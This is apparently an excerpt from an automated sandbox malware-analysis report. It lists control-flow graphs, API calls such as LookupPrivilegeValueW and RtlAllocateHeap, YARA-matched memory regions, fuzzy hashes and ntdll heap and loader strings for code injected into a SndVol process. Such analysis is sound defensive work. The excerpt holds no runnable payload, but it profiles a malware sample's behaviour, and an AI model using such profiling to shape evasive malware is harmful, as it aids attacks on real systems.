                                                                                                                                                  • Instruction Fuzzy Hash: 5A01D831A902297BF721AAA49C06FFE776C5B40F55F05011DFF04BB2C0E6A4750647E6

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 416 47c8310-47c835a call 47dbe30 call 47dc9d0 call 47cacf0 call 47d4e50 425 47c835c-47c836e PostThreadMessageW 416->425 426 47c838e-47c8392 416->426 427 47c838d 425->427 428 47c8370-47c838a call 47ca480 425->428 427->426 428->427
                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 047C836A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: 1e7cadd667d1187d95f5ac89d1dcc6b80261ede2748510a503934ad0d49504a3
                                                                                                                                                  • Instruction ID: 2f594f5bc6eea6772db070de15469172838763fcf22e465d5a3d719af56a3d75
                                                                                                                                                  • Opcode Fuzzy Hash: 1e7cadd667d1187d95f5ac89d1dcc6b80261ede2748510a503934ad0d49504a3
                                                                                                                                                  • Instruction Fuzzy Hash: 0301A231A9022C7BF721AAA49C06FBE776C5B40F56F05011DFF04BA2C1E6A47A0647F6

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 444 47da634-47da639 445 47da65c-47da671 RtlFreeHeap 444->445 446 47da63b 444->446 447 47da63d-47da656 446->447 448 47da5f8-47da5fd 446->448 447->445 451 47da657 call 47daf30 447->451 451->445
                                                                                                                                                  APIs
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,047C9CF3,?,?,047C9CF3,00000060,00000000,00000000,?,?,047C9CF3,?,00000000), ref: 047DA66D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3298025750-0

Control-flow Graph
• Nodes: 452 47da745-47da749; 453 47da74b-47da74e; 454 47da79a-47da7ba (call 47daf30); 456 47da7bf-47da7d4 (LookupPrivilegeValueW)
• Edges: 452->453, 452->454, 453->454, 454->456
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,047CF1D2,047CF1D2,0000003C,00000000,?,047C9D65), ref: 047DA7D0
Memory Dump Source
• Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0

Control-flow Graph
• Nodes: 460 47da792-47da7b9; 461 47da7bf-47da7d4 (LookupPrivilegeValueW); 462 47da7ba (call 47daf30)
• Edges: 460->461, 460->462, 462->461
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,047CF1D2,047CF1D2,0000003C,00000000,?,047C9D65), ref: 047DA7D0
Memory Dump Source
• Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0

Control-flow Graph
• Nodes: 466 47da640-47da671 (call 47daf30; RtlFreeHeap)
• Edges: none (single block)
APIs
• RtlFreeHeap.NTDLL(00000060,047C9CF3,?,?,047C9CF3,00000060,00000000,00000000,?,?,047C9CF3,?,00000000), ref: 047DA66D
Memory Dump Source
• Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0

Control-flow Graph
• Nodes: 463 47da600-47da631 (call 47daf30; RtlAllocateHeap)
• Edges: none (single block)
APIs
• RtlAllocateHeap.NTDLL(047D4536,?,047D4CAF,047D4CAF,?,047D4536,?,?,?,?,?,00000000,047C9CF3,?), ref: 047DA62D
Memory Dump Source
• Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,047CF1D2,047CF1D2,0000003C,00000000,?,047C9D65), ref: 047DA7D0
Memory Dump Source
• Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 047DA6A8
Memory Dump Source
• Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 047DA6A8
Memory Dump Source
• Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
Strings
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/[6$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
• API String ID: 0-321197408
Strings
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                                  • API String ID: 0-3591852110
                                                                                                                                                  • Opcode ID: 8752e9f730f4534b9a6d272dcf6ece9e89a5fae2de504173625fcd777ab4da53
                                                                                                                                                  • Instruction ID: 27ce53d99a67a09aa818ae7ca9ada7e1943c0009ee49257ffce04e1811e4e073
                                                                                                                                                  • Opcode Fuzzy Hash: 8752e9f730f4534b9a6d272dcf6ece9e89a5fae2de504173625fcd777ab4da53
                                                                                                                                                  • Instruction Fuzzy Hash: 5112CD74A00745EFE716AF26C840BB6FFF1EF09388F5484A9E4958BA51D734E880CB91
                                                                                                                                                  Strings
                                                                                                                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3658D0CF
                                                                                                                                                  • H/[6, xrefs: 365EA843
                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3658D2C3
                                                                                                                                                  • @, xrefs: 3658D2AF
                                                                                                                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3658D262
                                                                                                                                                  • @, xrefs: 3658D0FD
                                                                                                                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3658D146
                                                                                                                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 3658D196
                                                                                                                                                  • @, xrefs: 3658D313
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/[6$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                                  • API String ID: 0-1884362703
                                                                                                                                                  • Opcode ID: d07b637d3853d7176b66f5b45c15923cf2c9d62f2b39d7d63cb39d7867fa871c
                                                                                                                                                  • Instruction ID: 4fe1082591d201bf789863c0d7707151bf41b6612b4511713dd13b517fe7a1d2
                                                                                                                                                  • Opcode Fuzzy Hash: d07b637d3853d7176b66f5b45c15923cf2c9d62f2b39d7d63cb39d7867fa871c
                                                                                                                                                  • Instruction Fuzzy Hash: 3BA13B729083559FE711CF25C880B9BB7E8BB84759F504A3EE99897240DB74D908CF93
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                                                  • API String ID: 2994545307-3063724069
                                                                                                                                                  • Opcode ID: ba123659c0db2b06412c789cab9d7d6910b7659b534906c637715bcb812a285b
                                                                                                                                                  • Instruction ID: d2c470e36b4c28a2c57d63e17e3f2508974658345aa7a17da64c2df081db746a
                                                                                                                                                  • Opcode Fuzzy Hash: ba123659c0db2b06412c789cab9d7d6910b7659b534906c637715bcb812a285b
                                                                                                                                                  • Instruction Fuzzy Hash: 44D191B2805315AFE721CE56C880B5BBBE8AFC4794F804A29F994A7150D774C948CFD7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                  • API String ID: 0-523794902
                                                                                                                                                  • Opcode ID: 93d4c334f03bf086322ab7f4aafc7905ad63250aaaaa8d8dee51aca99edc5ac1
                                                                                                                                                  • Instruction ID: 880d3339cb0a46a45c7020c4a0645d1d338f7871749135eb972f017795d131d0
                                                                                                                                                  • Opcode Fuzzy Hash: 93d4c334f03bf086322ab7f4aafc7905ad63250aaaaa8d8dee51aca99edc5ac1
                                                                                                                                                  • Instruction Fuzzy Hash: 8C420D756183819FE701CF29C880A6ABBE5FF88388F54497DE895CB651DB34E881CF52
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: H/[6$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                  • API String ID: 0-92358325
                                                                                                                                                  • Opcode ID: 461d7d23328a58a87810dcb77eccd2faddf6656866406e7cee441729e074b981
                                                                                                                                                  • Instruction ID: 50fbc4cf2807fe2d0d83f815569a61ba317483f19815d20d4f4e0edc9cfff323
                                                                                                                                                  • Opcode Fuzzy Hash: 461d7d23328a58a87810dcb77eccd2faddf6656866406e7cee441729e074b981
                                                                                                                                                  • Instruction Fuzzy Hash: 13F14DB6D10229EFDF06CF99CD80A9EBBB9EF48650F50447AE501EB250D6759E01CFA0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                  • API String ID: 0-122214566
                                                                                                                                                  • Opcode ID: 0097804649ab0336cab9d6d50c8784edf1dbb28d5227bc99ab4f23fd51943638
                                                                                                                                                  • Instruction ID: d49ed5371e0f3a1aa0b420a7793cc391be5bc9f421809243fdf0e8223fc1cb87
                                                                                                                                                  • Opcode Fuzzy Hash: 0097804649ab0336cab9d6d50c8784edf1dbb28d5227bc99ab4f23fd51943638
                                                                                                                                                  • Instruction Fuzzy Hash: B2C12771E20315ABEB168F65CC80B7E7BB5AF85348F5441BAE881AF290EB74C944C7D1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                  • API String ID: 0-1745908468
                                                                                                                                                  • Opcode ID: 4d4952972a842906228183f7d17ea0a847f66a6b85c0c3099aa8df41c9d94b07
                                                                                                                                                  • Instruction ID: 982b19f275eca3f2319c7e77eab0a9045b1f59ea8e50e1e929a36a64716e6965
                                                                                                                                                  • Opcode Fuzzy Hash: 4d4952972a842906228183f7d17ea0a847f66a6b85c0c3099aa8df41c9d94b07
                                                                                                                                                  • Instruction Fuzzy Hash: AA916335A02344EFDB02CFAAC840A9DBBF6FF49784F648069E445AB671CB349840CB56
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 366002BD
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 3660031E
                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 366002E7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                  • Opcode ID: a81202d73b2b6fab285dd6fa15c5f8974846838b496e015231185b03743dc3ee
                                                                                                                                                  • Instruction ID: 3f7f1fde8cc13e790ad509e1dbd1b3a1450d6759875453322fe9dd85dd9ee1f9
                                                                                                                                                  • Opcode Fuzzy Hash: a81202d73b2b6fab285dd6fa15c5f8974846838b496e015231185b03743dc3ee
                                                                                                                                                  • Instruction Fuzzy Hash: D5E1A174A087419FE715CF69C880B1AB7E0BB88394F204A7DF5A4C72D1DB74D945CB92
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-1975516107
                                                                                                                                                  • Opcode ID: 427f256de0d602f9f6218e437f481ccccda52c5c24a7dd4058416e33dd63e5aa
                                                                                                                                                  • Instruction ID: 3148a195a0aa1cf14ef77253106e920d000702052849d54987d0c974f6e70642
                                                                                                                                                  • Opcode Fuzzy Hash: 427f256de0d602f9f6218e437f481ccccda52c5c24a7dd4058416e33dd63e5aa
                                                                                                                                                  • Instruction Fuzzy Hash: 4151DE75E04349AFEB05CFA4C89479DBBB2BF48358F644279E904BB281D775A842CF81
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: This is located in the %s field of the heap header.$ -X6`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                                                  • API String ID: 2994545307-3831304273
                                                                                                                                                  • Opcode ID: c8d46ce60f567171e3e539ae8ddbd6f50b642229c2b51457669e014c6cb4dea3
                                                                                                                                                  • Instruction ID: 6abcd1e7c201610d5eb5a312831ae569acc4717a781198392dcfdfe40cae9797
                                                                                                                                                  • Opcode Fuzzy Hash: c8d46ce60f567171e3e539ae8ddbd6f50b642229c2b51457669e014c6cb4dea3
                                                                                                                                                  • Instruction Fuzzy Hash: 2E31F575600214EFE712DFAACC80F67BBE9FF467A4F5000A5F541DB690DA30D980CA56
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                  • API String ID: 0-3061284088
                                                                                                                                                  • Opcode ID: c0c62d359fe9b16318e6f51b562f72e0a602fca8b25e52dcc5ec742e3ff9ef4b
                                                                                                                                                  • Instruction ID: fb54646c0a9d6c74e0a90435cf3cd5d6779f1f72e53e5e7d9f898d84bd459462
                                                                                                                                                  • Opcode Fuzzy Hash: c0c62d359fe9b16318e6f51b562f72e0a602fca8b25e52dcc5ec742e3ff9ef4b
                                                                                                                                                  • Instruction Fuzzy Hash: 4801FC36515194EFE3159F26D90DF927BF8DF827B4F2440B9E01057A61CAA8E880C965
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                  • API String ID: 0-3178619729
                                                                                                                                                  • Opcode ID: 9f16d3ea110c7f2d571ef3f9fc10c34ae3534abf63f6f621d2adf2ea8ddb3f96
                                                                                                                                                  • Instruction ID: 4395456cc2b943da6827d1d167910464ccbd7fac581c7a3d79f4b53da91a643e
                                                                                                                                                  • Opcode Fuzzy Hash: 9f16d3ea110c7f2d571ef3f9fc10c34ae3534abf63f6f621d2adf2ea8ddb3f96
                                                                                                                                                  • Instruction Fuzzy Hash: E513ACB8E003559FEB16CF69C8947ADBBF1BF48304F2485A9D849AB381D734A945CF90
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                                                  • API String ID: 2994545307-3570731704
                                                                                                                                                  • Opcode ID: d9df10f30dab9cac279c60ab95a6665e656c15945a5d69516e63ec5948d64894
                                                                                                                                                  • Instruction ID: dc89d4d738f136da460f8f099546c9eed7ec70b4951054b9e260fa104c0c156c
                                                                                                                                                  • Opcode Fuzzy Hash: d9df10f30dab9cac279c60ab95a6665e656c15945a5d69516e63ec5948d64894
                                                                                                                                                  • Instruction Fuzzy Hash: 56924975E11329CFEB25CF29CC40B99BBB6AF45394F1581E9D949AB280D7309E80CF51
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $$.mui$.mun$SystemResources\
                                                                                                                                                  • API String ID: 0-3047833772
